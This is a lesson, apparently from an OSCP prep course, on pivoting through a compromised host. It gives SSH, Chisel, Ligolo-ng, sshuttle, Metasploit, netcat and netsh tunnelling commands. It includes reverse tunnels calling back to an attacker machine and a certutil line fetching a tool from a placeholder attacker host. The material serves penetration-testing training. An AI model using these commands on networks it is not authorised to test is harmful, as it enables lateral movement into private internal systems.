Post-Exploitation & Privilege Escalation
Pivoting & Port Forwarding
4 min read
Pivoting allows you to reach internal network segments through a compromised host. This is essential for OSCP's Active Directory portion.
Understanding Pivoting
Attacker ────────> Compromised Host ────────> Internal Network
10.10.14.5 192.168.1.10 172.16.1.0/24
(Dual-homed)
SSH Port Forwarding
Local Port Forwarding
Forward a remote port to your local machine:
# Syntax
ssh -L [local_port]:[target_ip]:[target_port] user@pivot_host
# Example: Access internal web server
ssh -L 8080:172.16.1.20:80 user@192.168.1.10
# Now browse: http://localhost:8080
# Example: Access internal SMB
ssh -L 445:172.16.1.20:445 user@192.168.1.10
# Now use: smbclient //localhost/share
Dynamic Port Forwarding (SOCKS Proxy)
Create a SOCKS proxy through the pivot:
# Create SOCKS proxy on port 1080
ssh -D 1080 user@pivot_host
# Configure tools to use proxy
proxychains nmap -sT 172.16.1.0/24
proxychains curl http://172.16.1.20
# Edit /etc/proxychains.conf
socks4 127.0.0.1 1080
Remote Port Forwarding
Expose a local service to the remote network:
# Syntax
ssh -R [remote_port]:[local_ip]:[local_port] user@pivot_host
# Example: Expose local web server
ssh -R 8080:127.0.0.1:80 user@pivot_host
# Remote users can access your server at pivot_host:8080
Chisel (Recommended for OSCP)
Chisel is a fast TCP/UDP tunnel transported over HTTP.
Setup
# On attacker (server mode)
chisel server -p 8000 --reverse
# On pivot host (client mode - reverse)
chisel client attacker-ip:8000 R:1080:socks
Port Forwarding Examples
# Reverse SOCKS proxy
# Server: chisel server -p 8000 --reverse
# Client: chisel client 10.10.14.5:8000 R:1080:socks
# Use: proxychains nmap 172.16.1.20
# Forward specific port
# Server: chisel server -p 8000 --reverse
# Client: chisel client 10.10.14.5:8000 R:3389:172.16.1.20:3389
# Connect: rdesktop localhost:3389
Ligolo-ng (Modern Alternative)
# On attacker
ligolo-proxy -selfcert
# On pivot host
ligolo-agent -connect attacker-ip:11601 -ignore-cert
# In ligolo-proxy interface
session
start
SSHuttle (Linux to Linux)
# Route all traffic to internal network
sshuttle -r user@pivot_host 172.16.1.0/24
# Multiple networks
sshuttle -r user@pivot_host 172.16.1.0/24 10.10.10.0/24
Metasploit Pivoting (Use on One Machine Only)
# After getting Meterpreter session
meterpreter> run autoroute -s 172.16.1.0/24
# Or add route manually
msf> route add 172.16.1.0 255.255.255.0 [session_id]
# Use SOCKS proxy
msf> use auxiliary/server/socks_proxy
msf> set SRVPORT 1080
msf> run
Netcat Relay
# Simple port forward (Linux)
mkfifo /tmp/f
cat /tmp/f | nc 172.16.1.20 80 | nc -lvp 8080 > /tmp/f
# Windows (using PowerShell)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.1.20
Proxychains Configuration
Setup
# Edit /etc/proxychains.conf
# Comment out: proxy_dns
# Add at bottom:
socks4 127.0.0.1 1080
# or
socks5 127.0.0.1 1080
Usage
# Nmap through proxy (TCP only!)
proxychains nmap -sT -Pn 172.16.1.20
# SMB enumeration
proxychains smbclient -L //172.16.1.20 -N
# CrackMapExec
proxychains crackmapexec smb 172.16.1.0/24
Windows Pivoting Tools
plink.exe (PuTTY)
# Download plink
certutil -urlcache -split -f http://attacker/plink.exe plink.exe
# Dynamic port forward (SOCKS)
plink.exe -ssh -D 1080 user@attacker-ip
# Local port forward
plink.exe -ssh -L 8080:172.16.1.20:80 user@attacker-ip
netsh Port Forwarding
# Add port forward
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=172.16.1.20 connectport=80
# Show forwards
netsh interface portproxy show all
# Remove forward
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8080
Pivoting Cheat Sheet
| Tool | Use Case | Command |
|---|---|---|
| SSH -L | Local forward | ssh -L 8080:target:80 user@pivot |
| SSH -D | SOCKS proxy | ssh -D 1080 user@pivot |
| Chisel | Firewall bypass | chisel client ip:port R:1080:socks |
| SSHuttle | Route traffic | sshuttle -r user@pivot 10.0.0.0/24 |
| Proxychains | Use proxy | proxychains nmap target |
Pivoting Workflow
1. Identify internal networks from compromised host
└── ip a, route, arp -a
2. Set up tunnel/pivot
└── Chisel, SSH, Ligolo
3. Configure proxychains
└── /etc/proxychains.conf
4. Enumerate internal network
└── proxychains nmap -sT
5. Attack internal targets
└── proxychains crackmapexec smb
With pivoting mastered, we'll move to Active Directory attacks and exam simulation in the final module. :::